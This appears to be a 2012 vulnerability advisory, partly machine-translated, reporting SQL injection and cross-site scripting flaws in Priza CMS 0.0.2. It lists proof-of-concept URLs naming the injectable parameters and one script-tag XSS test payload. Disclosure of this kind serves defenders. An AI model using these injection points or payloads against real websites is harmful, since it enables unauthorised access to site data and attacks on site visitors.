Priza CMS plurality of defect and repair-vulnerability warning-the black bar safety net

2012-01-08T00:00:00
ID MYHACK58:62201232842
Type myhack58
Reporter 佚名
Modified 2012-01-08T00:00:00

Description

Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability

Author: BHG Security Center www.badguest.cn

Software address: http://www.priza.co.il/

Affected version: [0.0.2]

Test platform: ubuntu 11.04

Found by:

- Net. Edit0r (Net. edit0r [at] att [dot] net)

- G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)

-----------------------------------------------------------------------------------------

Priza Israel Cms SQL Injection / XSS Multiple Vulnerability

-----------------------------------------------------------------------------------------

Author : BHG Security Center

---------------------------------------------------------------------------

PoC/Exploit:

~~~~~~~~~~

~ [PoC] ~: /website_path/index. asp? p_id=2 0 1&id=[SQLi]

~ [PoC] ~: /website_path/index. asp? page_id=[SQLi]

~ [PoC] ~: /website_path/volumes. asp? id=1 8

~ [PoC] ~: /website_path/index. asp? action=find&page_id=2 8&string=[Xss]

~~~~~~~~ Test

~ [PoC] ~: Http://www.badguest.cn /path/index. asp? p_id=2 0 1&id=[SQLi]

~ [PoC] ~: Http://www.badguest.cn /path/index. asp? action=find&page_id=2 8&string="><script>alert(0)</script>

-------------------------------- [ EOF] ----------------------------------